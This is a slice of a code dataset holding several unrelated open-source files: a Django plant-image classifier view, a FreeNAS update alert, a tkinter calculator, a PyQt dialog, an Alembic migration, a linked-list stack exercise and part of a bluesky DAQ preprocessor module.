torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\ndef process_image(image):\r\n    ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\r\n        returns an Numpy array\r\n    '''\r\n    # Process a PIL image for use in a PyTorch model\r\n    image = TF.resize(image, 256)\r\n    upper_pixel = (image.height - 224) // 2\r\n    left_pixel = (image.width - 224) // 2\r\n    image = TF.crop(image, upper_pixel, left_pixel, 224, 224)\r\n    image = TF.to_tensor(image)\r\n    image = TF.normalize(image, normalize_mean, normalize_std)\r\n    return image\r\ndef predict(image_path, model, topk=5):\r\n    ''' Predict the class (or classes) of an image using a trained deep learning model.\r\n    '''\r\n    \r\n    # Implement the code to predict the class from an image file\r\n    image = 
Image.open(image_path)\r\n image = process_image(image)\r\n \r\n with torch.no_grad():\r\n model.eval()\r\n image = image.view(1,3,224,224)\r\n image = image.to(device)\r\n predictions = model.forward(image)\r\n predictions = torch.exp(predictions)\r\n top_ps, top_class = predictions.topk(topk, dim=1)\r\n return top_ps, top_class\r\n\r\ndef predImg(request):\r\n if request.method == 'POST': \r\n context = {} \r\n uploaded_file= request.FILES['img'] \r\n fs = FileSystemStorage() \r\n name = fs.save(uploaded_file.name, uploaded_file) \r\n context[\"url\"] = fs.url(name)\r\n print(context[\"url\"]) \r\n testimage = '.'+context[\"url\"] \r\n probs,classes= predict(testimage,model)\r\n with open('media/new.json', 'r') as f:\r\n cat_to_name = json.load(f)\r\n test=pd.read_csv('media/data.csv',encoding='utf-8')\r\n a=classes[0,0].tolist()\r\n b=classes[0,1].tolist()\r\n c=classes[0,2].tolist()\r\n d=classes[0,3].tolist()\r\n e=classes[0,4].tolist()\r\n a1=cat_to_name[str(a)]\r\n b1=cat_to_name[str(b)]\r\n c1=cat_to_name[str(c)]\r\n d1=cat_to_name[str(d)]\r\n e1=cat_to_name[str(e)]\r\n x=classes[0,0].tolist()\r\n y=classes[0,1].tolist()\r\n z=classes[0,2].tolist()\r\n w=classes[0,3].tolist()\r\n j=classes[0,4].tolist()\r\n context[\"classes\"]=a1+str(y)+\"%\"\r\n context[\"s1\"]=b1+\"\\n\\n\"+str(y)+\"%\"\r\n context[\"s2\"]=c1+\"\\n\\n\"+str(z)+\"%\"\r\n context[\"s3\"]=d1+\"\\n\\n\"+str(w)+\"%\"\r\n context[\"s4\"]=e1+\"\\n\\n\"+str(j)+\"%\"\r\n context[\"step1\"]=test.iloc[a-1][0]\r\n context[\"step2\"]=test.iloc[a-1][1]\r\n context[\"step3\"]=test.iloc[a-1][2]\r\n context[\"step4\"]=test.iloc[a-1][4]\r\n context[\"step5\"]=test.iloc[a-1][3]\r\n path_img1 = \"media/semi/\"+str(b)+\".jpg\"\r\n context[\"u1\"]=path_img1\r\n path_img2 = \"media/semi/\"+str(c)+\".jpg\"\r\n context[\"u2\"]=path_img2\r\n path_img3 = \"media/semi/\"+str(d)+\".jpg\"\r\n context[\"u3\"]=path_img3\r\n path_img4 =\"media/semi/\"+str(e)+\".jpg\"\r\n context[\"u4\"]=path_img4\r\n print(a,b,c,d,e)\r\n return render(request,\"page1.html\",context)\r\n else:\r\n return render(request,\"page1.html\")\r\n\r\ndef predImg2(request):\r\n if request.method == 'GET': \r\n context = {} \r\n val=request.GET['p1']\r\n with open('media/new.json', 'r') as f:\r\n cat_to_name = json.load(f)\r\n for key, value in cat_to_name.items():\r\n if val == value:\r\n k=key\r\n pathimg=\"media/semi/\" + k +\".jpg\"\r\n context[\"url\"] = pathimg\r\n print(context[\"url\"]) \r\n testimage = pathimg\r\n probs,classes= predict(testimage,model)\r\n test=pd.read_csv('media/data.csv',encoding='utf-8')\r\n b=classes[0,1].tolist()\r\n c=classes[0,2].tolist()\r\n d=classes[0,3].tolist()\r\n e=classes[0,4].tolist()\r\n a1=cat_to_name[k]\r\n b1=cat_to_name[str(b)]\r\n c1=cat_to_name[str(c)]\r\n d1=cat_to_name[str(d)]\r\n e1=cat_to_name[str(e)]\r\n x=classes[0,0].tolist()\r\n y=classes[0,1].tolist()\r\n z=classes[0,2].tolist()\r\n w=classes[0,3].tolist()\r\n j=classes[0,4].tolist()\r\n context[\"classes\"]=a1\r\n context[\"s1\"]=b1+\"\\n\\n\"+str(y)+\"%\"\r\n context[\"s2\"]=c1+\"\\n\\n\"+str(z)+\"%\"\r\n context[\"s3\"]=d1+\"\\n\\n\"+str(w)+\"%\"\r\n context[\"s4\"]=e1+\"\\n\\n\"+str(j)+\"%\"\r\n a=int(k)\r\n context[\"step1\"]=test.iloc[a-1][0]\r\n context[\"step2\"]=test.iloc[a-1][1]\r\n context[\"step3\"]=test.iloc[a-1][2]\r\n context[\"step4\"]=test.iloc[a-1][4]\r\n context[\"step5\"]=test.iloc[a-1][3]\r\n path_img1 = \"media/semi/\"+str(b)+\".jpg\"\r\n context[\"u1\"]=path_img1\r\n path_img2 = \"media/semi/\"+str(c)+\".jpg\"\r\n 
context[\"u2\"]=path_img2\r\n path_img3 = \"media/semi/\"+str(d)+\".jpg\"\r\n context[\"u3\"]=path_img3\r\n path_img4 =\"media/semi/\"+str(e)+\".jpg\"\r\n context[\"u4\"]=path_img4\r\n print(a,b,c,d,e)\r\n return render(request,\"page1.html\",context)\r\n else:\r\n return render(request,\"page1.html\")\r\n\r\n# def home(request):\r\n# return HttpResponse(\"Hello, Django!\")\r\n\r\n# def predImg1(request):\r\n# if request.method == 'POST':\r\n \r\n# context = {}\r\n# uploaded_file= request.FILES['img']\r\n# fs = FileSystemStorage()\r\n# name = fs.save(uploaded_file.name, uploaded_file)\r\n# context[\"url\"] = fs.url(name)\r\n# print(context[\"url\"])\r\n# df=pd.read_csv('media/data.csv',encoding='utf-8')\r\n# info=df.iloc[0][0]\r\n# context[\"gg\"]=info\r\n# return render(request,'asmaa.html',context);\r\n\r\n# def test(request):\r\n# fs = FileSystemStorage()\r\n# var1 = request.GET['1']\r\n# context[\"url\"]=fs.url(var1)\r\n# return render(request,'t3.html',context);","repo_name":"tuqaty/Plant-Explorer","sub_path":"applic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6285353104","text":"from django.utils.translation import ugettext as _\n\nfrom freenasOS.Update import PendingUpdates\nfrom freenasUI.middleware.notifier import notifier\nfrom freenasUI.system.alert import alertPlugins, Alert, BaseAlert\nfrom freenasUI.system.models import Update\n\n\nclass UpdateCheckAlert(BaseAlert):\n\n interval = 60\n\n def run(self):\n alerts = []\n try:\n Update.objects.order_by('-id')[0]\n except IndexError:\n Update.objects.create()\n\n path = notifier().get_update_location()\n if not path:\n return None\n try:\n updates = PendingUpdates(path)\n except:\n updates = None\n\n if updates:\n alerts.append(\n Alert(\n Alert.OK,\n _(\n 'There is a new update available! 
Apply it in System '\n '-> Update tab.'\n ),\n )\n )\n return alerts\n\nalertPlugins.register(UpdateCheckAlert)\n","repo_name":"rohitkeshri1986/my-freeNASS","sub_path":"gui/system/alertmods/update_check.py","file_name":"update_check.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"512919720","text":"import tkinter\r\nfrom tkinter import *\r\n\r\n\r\nglobal textvariable\r\n\r\ndef btn_clicked(numbers):\r\n\tglobal operator\r\n\toperator = operator + str(numbers)\r\n\ttext_input.set(operator)\r\n\r\ndef clear_display():\r\n\tglobal operator\r\n\toperator = ''\r\n\ttext_input.set('')\r\n\r\n\r\ndef btn_equals():\r\n try:\r\n global operator\r\n sum_up = str(eval(operator))\r\n intr = str(sum_up)\r\n text_input.set(intr)\r\n operator = ''\r\n except ZeroDivisionError:\r\n err = \"Divided By Zero!!\"\r\n text_input.set(err)\r\n except ValueError:\r\n err2 = 'Value Error'\r\n text_input.set(err2)\r\n except SyntaxError:\r\n err3 = \"Syntax Error\"\r\n text_input.set(err3)\r\n\r\n\r\n\r\n\r\n\r\nroot = tkinter.Tk()\r\nroot.geometry('250x400+300+300')\r\nroot.resizable(0,0)\r\nroot.title('Calculator')\r\nroot.iconbitmap(r'calc.ico')\r\n\r\n\r\noperator = \"\"\r\ntext_input = StringVar()\r\n\r\n\r\n\r\nentry1 =Entry(\r\n\troot,\r\n\tjustify = 'right',\r\n\tfont = ('verdana', 20),\r\n\ttextvariable = text_input,\r\n\tbg = '#ffffff',\r\n\tfg = '#000000',\r\n)\r\n\r\n\r\nentry1.pack(expand = True, fill = 'both')\r\n\r\nrow_1 = Frame(root)\r\nrow_1.pack(expand = True, fill = 'both')\r\n\r\nrow_2 = Frame(root)\r\nrow_2.pack(expand = True, fill = 'both')\r\n\r\nrow_3 = Frame(root)\r\nrow_3.pack(expand = True, fill = 'both')\r\n\r\nrow_4 = Frame(root)\r\nrow_4.pack(expand = True, fill = 'both')\r\n\r\n\r\n\r\nbutton_1 = Button(\r\n\trow_1,\r\n\ttext = \"7\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(7)\r\n)\r\nbutton_1.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\nbutton_2 = Button(\r\n\trow_1,\r\n\ttext = \"8\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(8)\r\n)\r\nbutton_2.pack(side = 'left', expand = True, fill = 'both')\r\n\r\nbutton_3 = Button(\r\n\trow_1,\r\n\ttext = \"9\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(9)\r\n)\r\nbutton_3.pack(side = 'left', expand = True, fill = 'both')\r\n\r\nbutton_mult = Button(\r\n\trow_1,\r\n\ttext = \"*\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked('*')\r\n)\r\nbutton_mult.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\n\r\nbutton_4 = Button(\r\n\trow_2,\r\n\ttext = \"4\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(4)\r\n)\r\nbutton_4.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\nbutton_5 = Button(\r\n\trow_2,\r\n\ttext = \"5\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(5)\r\n)\r\nbutton_5.pack(side = 'left', expand = True, fill = 'both')\r\n\r\nbutton_6 = Button(\r\n\trow_2,\r\n\ttext = \"6\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(6)\r\n)\r\nbutton_6.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\n\r\nbutton_minus = Button(\r\n\trow_2,\r\n\ttext = 
\"-\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked('-')\r\n)\r\nbutton_minus.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\n\r\n\r\nbutton_7 = Button(\r\n\trow_3,\r\n\ttext = \"1\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(1)\r\n)\r\nbutton_7.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\nbutton_8 = Button(\r\n\trow_3,\r\n\ttext = \"2\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(2)\r\n)\r\nbutton_8.pack(side = 'left', expand = True, fill = 'both')\r\n\r\nbutton_9 = Button(\r\n\trow_3,\r\n\ttext = \"3\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(3)\r\n)\r\nbutton_9.pack(side = 'left', expand = True, fill = 'both')\r\n\r\nbutton_plus = Button(\r\n\trow_3,\r\n\ttext = \"+\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked('+')\r\n)\r\nbutton_plus.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\n\r\nbutton_c = Button(\r\n\trow_4,\r\n\ttext = \"C\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = clear_display\r\n)\r\nbutton_c.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\nbutton_0 = Button(\r\n\trow_4,\r\n\ttext = \"0\",\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tfont = ('verdana', 22),\r\n\tcommand = lambda : btn_clicked(0)\r\n\t\r\n)\r\nbutton_0.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\n\r\nbutton_div = Button(\r\n\trow_4,\r\n\ttext = \"/\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked('/')\r\n)\r\nbutton_div.pack(side = 'left', expand = True, fill = 'both')\r\n\r\nbutton_equal = Button(\r\n\trow_4,\r\n\ttext = \"=\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = btn_equals\r\n)\r\nbutton_equal.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\nroot.mainloop()\r\n","repo_name":"visionxStudio/Calculator","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70220827689","text":"\n \n# This program is free software; you can redistribute it and/or modify \n# it under the terms of the GNU General Public License as published by \n# the Free Software Foundation; either version 2 of the License, or \n# (at your option) any later version. \n \n# This program is distributed in the hope that it will be useful, \n# but WITHOUT ANY WARRANTY; without even the implied warranty of \n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n#GNU General Public License (http://www.gnu.org/licenses/gpl.txt) \n# for more details. 
\n\nimport os\n\nfrom PyQt5.QtCore import Qt, pyqtSlot, pyqtSignal\nfrom PyQt5.QtGui import QImage, QPixmap, QIcon, qRgb, qRed, qGreen, qBlue\nfrom PyQt5.QtWidgets import QWidget, QCheckBox, QFileDialog, QComboBox, QSizePolicy, QLineEdit, QLabel, QPushButton, QHBoxLayout, QVBoxLayout\n\nclass QtNewDatasetWidget(QWidget):\n\n closed = pyqtSignal()\n\n def __init__(self, export_area, parent=None):\n super(QtNewDatasetWidget, self).__init__(parent)\n\n self.setStyleSheet(\"background-color: rgb(40,40,40); color: white\")\n TEXT_SPACE = 150\n LINEWIDTH = 300\n\n ###########################################################\n\n self.lblDatasetFolder = QLabel(\"Dataset folder: \")\n self.lblDatasetFolder.setFixedWidth(TEXT_SPACE)\n self.lblDatasetFolder.setAlignment(Qt.AlignRight)\n self.lblExportArea = QLabel(\"Area to export: \")\n self.lblExportArea.setFixedWidth(TEXT_SPACE)\n self.lblExportArea.setAlignment(Qt.AlignRight)\n\n self.lblSplitMode = QLabel(\"Dataset split:\")\n self.lblSplitMode.setFixedWidth(TEXT_SPACE)\n self.lblSplitMode.setAlignment(Qt.AlignRight)\n self.lblTargetScale = QLabel(\"Target pixel size:\")\n self.lblTargetScale.setFixedWidth(TEXT_SPACE)\n self.lblTargetScale.setAlignment(Qt.AlignRight)\n\n\n layoutH0a = QVBoxLayout()\n layoutH0a.setAlignment(Qt.AlignRight)\n layoutH0a.addWidget(self.lblDatasetFolder)\n layoutH0a.addWidget(self.lblExportArea)\n layoutH0a.addWidget(self.lblSplitMode)\n layoutH0a.addWidget(self.lblTargetScale)\n\n ###########################################################\n\n self.editDatasetFolder = QLineEdit(\"temp\")\n self.editDatasetFolder.setStyleSheet(\"background-color: rgb(55,55,55); border: 1px solid rgb(90,90,90)\")\n self.editDatasetFolder.setMinimumWidth(LINEWIDTH)\n self.editExportArea = QLineEdit(\"\")\n self.editExportArea.setStyleSheet(\"background-color: rgb(55,55,55); border: 1px solid rgb(90,90,90)\")\n self.editExportArea.setMinimumWidth(LINEWIDTH)\n self.comboSplitMode = QComboBox()\n self.comboSplitMode.setStyleSheet(\"background-color: rgb(55,55,55); border: 1px solid rgb(90,90,90)\")\n self.comboSplitMode.setFixedWidth(LINEWIDTH)\n self.comboSplitMode.addItem(\"Uniform (vertical)\")\n self.comboSplitMode.addItem(\"Uniform (horizontal)\")\n # self.comboSplitMode.addItem(\"Random\")\n self.comboSplitMode.addItem(\"Biologically-inspired\")\n self.editTargetScale = QLineEdit(\"1.0\")\n self.editTargetScale .setStyleSheet(\"background-color: rgb(55,55,55); border: 1px solid rgb(90,90,90)\")\n self.editTargetScale .setMinimumWidth(LINEWIDTH)\n\n self.area_to_export = [0, 0, 0, 0]\n self.setAreaToExport(export_area[0], export_area[1], export_area[2], export_area[3])\n\n layoutH0b = QVBoxLayout()\n layoutH0b.setAlignment(Qt.AlignLeft)\n layoutH0b.addWidget(self.editDatasetFolder)\n layoutH0b.addWidget(self.editExportArea)\n layoutH0b.addWidget(self.comboSplitMode)\n layoutH0b.addWidget(self.editTargetScale)\n\n ###############################################################\n\n self.btnChooseDatasetFolder = QPushButton(\"...\")\n self.btnChooseDatasetFolder.clicked.connect(self.chooseDatasetFolder)\n\n self.btnChooseExportArea = QPushButton()\n exportAreaIcon = QIcon(\"icons\\\\select_area.png\")\n self.btnChooseExportArea.setIcon(exportAreaIcon)\n\n layoutH0c = QVBoxLayout()\n layoutH0c.addWidget(self.btnChooseDatasetFolder)\n layoutH0c.addWidget(self.btnChooseExportArea)\n layoutH0c.addStretch()\n\n layoutH1 = QHBoxLayout()\n layoutH1.addLayout(layoutH0a)\n layoutH1.addLayout(layoutH0b)\n layoutH1.addLayout(layoutH0c)\n\n 
###########################################################\n\n self.checkOversampling = QCheckBox(\"Oversampling\")\n self.checkTiles = QCheckBox(\"Show exported tiles\")\n\n layoutH2 = QHBoxLayout()\n layoutH2.setAlignment(Qt.AlignCenter)\n layoutH2.addStretch()\n #layoutH2.addWidget(self.checkOversampling)\n layoutH2.addWidget(self.checkTiles)\n layoutH2.addStretch()\n\n ###########################################################\n\n layoutH3 = QHBoxLayout()\n\n self.btnCancel = QPushButton(\"Cancel\")\n self.btnCancel.clicked.connect(self.close)\n self.btnExport = QPushButton(\"Export\")\n\n layoutH3.setAlignment(Qt.AlignRight)\n layoutH3.addStretch()\n layoutH3.addWidget(self.btnCancel)\n layoutH3.addWidget(self.btnExport)\n\n ###########################################################\n\n layoutV = QVBoxLayout()\n layoutV.addLayout(layoutH1)\n layoutV.addLayout(layoutH2)\n layoutV.addLayout(layoutH3)\n self.setLayout(layoutV)\n\n self.setWindowTitle(\"Export New Training Dataset - Settings\")\n self.setWindowFlags(Qt.Window | Qt.CustomizeWindowHint | Qt.WindowCloseButtonHint | Qt.WindowTitleHint)\n\n @pyqtSlot()\n def chooseDatasetFolder(self):\n\n folderName = QFileDialog.getExistingDirectory(self, \"Choose a Folder to Export the Dataset\", \"\")\n if folderName:\n self.editDatasetFolder.setText(folderName)\n\n def closeEvent(self, event):\n self.closed.emit()\n super(QtNewDatasetWidget, self).closeEvent(event)\n\n def setAreaToExport(self, top, left, width, height):\n\n txt = str(int(left)) + ',' + str(int(top)) + ',' + str(int(width)) + ',' + str(int(height))\n self.area_to_export = [top, left, width, height]\n self.editExportArea.setText(txt)\n\n def getAreaToExport(self):\n\n return self.area_to_export\n\n def getDatasetFolder(self):\n\n return self.editDatasetFolder.text()\n\n def getSplitMode(self):\n\n return self.comboSplitMode.currentText()\n\n def getTargetScale(self):\n\n return float(self.editTargetScale.text())\n\n\n","repo_name":"AlbertBarreiro/TFG","sub_path":"source/QtNewDatasetWidget.py","file_name":"QtNewDatasetWidget.py","file_ext":"py","file_size_in_byte":6869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38123227351","text":"\"\"\"Add command to json log\n\nRevision ID: 8ad53c7df321\nRevises: 30b6bc6b6875\nCreate Date: 2020-09-04 07:41:17.435130\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"8ad53c7df321\"\ndown_revision = \"30b6bc6b6875\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\n \"jsonlog\", sa.Column(\"command_executed\", sa.UnicodeText(), nullable=True)\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column(\"jsonlog\", \"command_executed\")\n # ### end Alembic commands ###\n","repo_name":"qlands/FormShare","sub_path":"alembic/versions/8ad53c7df321_add_command_to_json_log.py","file_name":"8ad53c7df321_add_command_to_json_log.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"9394987785","text":"import sys\n\n\nclass Node:\n def __init__(self):\n self.data = None\n self.next = None\n\n\nclass LinkedList:\n def __init__(self):\n self.head = Node()\n self.cnt = 0\n\n def append(self, data):\n new_node = Node()\n new_node.data = data\n cur = self.head\n while cur.next is not None:\n cur = cur.next\n cur.next = new_node\n\n def get_node(self, index):\n cnt = 0\n node = self.head\n while cnt < index:\n cnt += 1\n node = node.next\n return node\n\n def add_node(self, value):\n new_node = Node()\n new_node.data = value\n cur = self.head\n if cur == None:\n self.head = new_node\n else:\n while cur.next is not None:\n cur = cur.next\n cur.next = new_node\n\n def delete_node(self):\n if self.cnt == 0:\n pass\n else:\n node = self.get_node(ll.cnt - 1)\n node.next = None\n\n\nll = LinkedList()\nfor _ in range(int(input())):\n cmd = sys.stdin.readline().strip()\n if cmd == \"pop\":\n temp = Node()\n temp.data = ll.get_node(ll.cnt).data\n ll.delete_node()\n if temp.data == None:\n print(-1)\n else:\n print(temp.data)\n ll.cnt -= 1\n\n elif cmd == \"size\":\n print(ll.cnt)\n elif cmd == \"empty\":\n print(int(ll.cnt == 0))\n elif cmd == \"top\":\n temp = Node()\n temp.data = ll.get_node(ll.cnt).data\n if temp.data == None:\n print(-1)\n else:\n print(temp.data)\n else:\n X = int(cmd[5:])\n ll.add_node(X)\n ll.cnt += 1\n","repo_name":"chrisheo/Algorithm-study","sub_path":"baekjoon/10828_스택.py","file_name":"10828_스택.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19879741603","text":"\"\"\"\nWrappers and decorators to modify existing plans.\n\nThis is the LCLS counterpart to `bluesky.preprocessors`.\n\nThis module contains \"wrapper\" functions that take a plan as an argument\nand yield messages from a new, modified plan, as well as \"decorator\"\nfunctions that can be applied to ``bluesky`` plan functions to return new\nplan functions with modifications.\n\"\"\"\nimport numbers\nfrom functools import wraps\n\nimport bluesky.plan_stubs as bps\nimport bluesky.preprocessors as bpp\nimport numpy as np\nfrom bluesky.utils import make_decorator\n\nfrom . import utils\nfrom .exceptions import DaqNotConfiguredError\n\n\ndef _get_daq():\n \"\"\"\n Helper function to get the active DAQ object.\n\n This also wraps the `pcdsdaq` import because `pcdsdaq` is an optional\n dependency of ``nabs``. This will fail unless `pcdsdaq` is installed.\n\n Returns\n -------\n daq : `pcdsdaq.daq.Daq`\n The DAQ (data aquisition) system `bluesky`-compatible control object.\n \"\"\"\n\n from pcdsdaq.daq import get_daq # NOQA\n daq = get_daq()\n if daq is None:\n raise DaqNotConfiguredError(\n \"The daq must first be configured to be used in a scan.\"\n )\n return daq\n\n\nclass _Dummy:\n \"\"\"\n Class to sub in for the DAQ when we need to drop a message.\n\n You can't just remove a message entirely with\n `bluesky.preprocessors.plan_mutator`, you need\n to yield a compatible message. 
To accomplish this we sub in a dummy object\n    for the daq to create a no-op with the right return value.\n    \"\"\"\n    def stage(self):\n        return [self]\n\n    def unstage(self):\n        return [self]\n\n\ndef daq_step_scan_wrapper(plan, events=None, duration=None, record=True,\n                          use_l3t=False):\n    \"\"\"\n    Wrapper to turn an open plan into a standard LCLS DAQ step plan.\n\n    This inserts the DAQ object into every `bluesky.plan_stubs.trigger` and\n    `bluesky.plan_stubs.read` pair, ensuring events are taken at every\n    bundle. It also stages the `pcdsdaq.daq.Daq` and yields an appropriate\n    `bluesky.plan_stubs.configure` message using the input arguments\n    and all motors moved prior to the first data point.\n\n    The DAQ trigger and the DAQ read always go first, before any other triggers\n    or reads, to ensure all events are recorded.\n\n    If the DAQ is manually passed into the wrapped plan, and it is the first\n    detector in the list, we will skip adding a redundant trigger/read. If the\n    DAQ is manually passed in as the second detector or later we will end up\n    with two triggers and two reads, which can cause problems. Running a scan\n    like this will raise a ``TypeError``.\n\n    See `daq_step_scan_decorator` for the function decorator version.\n\n    Parameters\n    ----------\n    plan : plan\n        A bluesky plan that yields bluesky Msg objects.\n\n    events : int, optional\n        Number of events to take at each step. If omitted, uses the\n        duration argument or the last configured value.\n\n    duration : int or float, optional\n        Duration of time to spend at each step. If omitted, uses the events\n        argument or the last configured value.\n\n    record : bool, optional\n        Whether or not to record the run in the DAQ. Defaults to True because\n        we don't want to accidentally skip recording good runs.\n\n    use_l3t : bool, optional\n        Whether or not to use the l3t filter for the events argument. Defaults\n        to False to avoid confusion from unconfigured filters.\n\n    Returns\n    -------\n    daq_step_plan : plan\n        The same plan as before, but modified appropriately to run the DAQ\n        at every step.
This will be an open generator.\n \"\"\"\n\n daq = _get_daq()\n motor_cache = set()\n\n class State:\n first_calib_cycle = True\n first_trigger = True\n first_read = True\n daq_has_triggered = False\n\n def daq_first_cycle(msg):\n if events is not None:\n yield from bps.configure(\n daq,\n events=events,\n record=record,\n use_l3t=use_l3t,\n controls=list(motor_cache),\n )\n elif duration is not None:\n yield from bps.configure(\n daq,\n duration=duration,\n record=record,\n use_l3t=use_l3t,\n controls=list(motor_cache),\n )\n else:\n yield from bps.configure(\n daq,\n record=record,\n use_l3t=use_l3t,\n controls=list(motor_cache),\n )\n return (yield from add_daq_trigger(msg))\n\n def add_daq_trigger(msg):\n if msg.obj is not daq:\n yield from bps.trigger(daq, group=msg.kwargs['group'])\n return (yield msg)\n\n def add_daq_read(msg):\n if msg.obj is not daq:\n yield from bps.read(daq)\n return (yield msg)\n\n def drop_daq_msg(msg):\n if msg.command == 'stage':\n return (yield from bps.stage(_Dummy()))\n if msg.command == 'unstage':\n return (yield from bps.unstage(_Dummy()))\n\n def daq_mutator(msg):\n # Reset \"first\" flags after closing a bundle\n if msg.command in ('save', 'drop'):\n State.first_trigger = True\n State.first_read = True\n State.daq_has_triggered = False\n # Insert daq trigger before first trigger\n elif msg.command == 'trigger':\n if msg.obj is daq:\n if State.daq_has_triggered:\n raise TypeError('Scan misconfigured; daq cannot be passed '\n 'unless it is the first detector.')\n else:\n State.daq_has_triggered = True\n if State.first_trigger:\n State.first_trigger = False\n # Configure before the first begin (after all motors found)\n if State.first_calib_cycle:\n State.first_calib_cycle = False\n return daq_first_cycle(msg), None\n return add_daq_trigger(msg), None\n # Insert daq read before first read\n elif msg.command == 'read' and State.first_read:\n State.first_read = False\n return add_daq_read(msg), None\n # Gather all moving devices for the daq controls configuration arg\n elif msg.command == 'set':\n motor_cache.add(msg.obj)\n # Strip redundant DAQ stages from inner plan\n elif msg.command in ('stage', 'unstage') and msg.obj is daq:\n return drop_daq_msg(msg), None\n # If didn't mutate, return the (None, None) signal for plan_mutator\n return None, None\n\n @bpp.stage_decorator([daq])\n def daq_step_plan():\n return (yield from bpp.plan_mutator(plan, daq_mutator))\n\n return (yield from daq_step_plan())\n\n\ndef daq_step_scan_decorator(plan):\n \"\"\"\n Decorator to turn a plan function into a standard LCLS DAQ step plan.\n\n This adds the standard DAQ configuration arguments\n events, duration, record, and use_l3t onto the plan function\n and wraps the plan in the `daq_step_scan_wrapper` to properly\n execute a step scan.\n\n See `daq_step_scan_standard_args` for argument specifications for the\n standard DAQ configuration arguments.\n\n Parameters\n ----------\n plan : plan\n A bluesky plan that yields bluesky Msg objects.\n\n Returns\n -------\n daq_step_plan : plan\n The same plan as before, but modified appropriately for DAQ use.\n This will be a callable generator function.\n \"\"\"\n\n @wraps(plan)\n def inner(*args, **kwargs):\n events = kwargs.pop('events', None)\n duration = kwargs.pop('duration', None)\n record = kwargs.pop('record', True)\n use_l3t = kwargs.pop('use_l3t', False)\n return (yield from daq_step_scan_wrapper(plan(*args, **kwargs),\n events=events,\n duration=duration,\n record=record,\n use_l3t=use_l3t))\n\n plan.__signature__ = 
utils.add_named_kwargs_to_signature(\n plan,\n kwargs=dict(events=None, duration=None, record=True, use_l3t=False),\n )\n return inner\n\n\ndef daq_step_scan_standard_args(events=None, duration=None, record=True,\n use_l3t=False):\n \"\"\"\n No-op function to hold template parameter info for generated docs.\n\n Parameters\n ----------\n events : int, optional\n Number of events to take at each step. If omitted, uses the\n duration argument or the last configured value.\n\n duration : int or float, optional\n Duration of time to spend at each step. If omitted, uses the events\n argument or the last configured value.\n\n record : bool, optional\n Whether or not to record the run in the DAQ. Defaults to True because\n we don't want to accidentally skip recording good runs.\n\n use_l3t : bool, optional\n Whether or not the use the l3t filter for the events argument. Defaults\n to False to avoid confusion from unconfigured filters.\n \"\"\"\n\n pass\n\n\ndef daq_during_wrapper(plan, record=True, use_l3t=False, controls=None):\n \"\"\"\n Wrap a plan so that the DAQ runs at the same time.\n\n This can be used with an ordinary ``bluesky`` plan 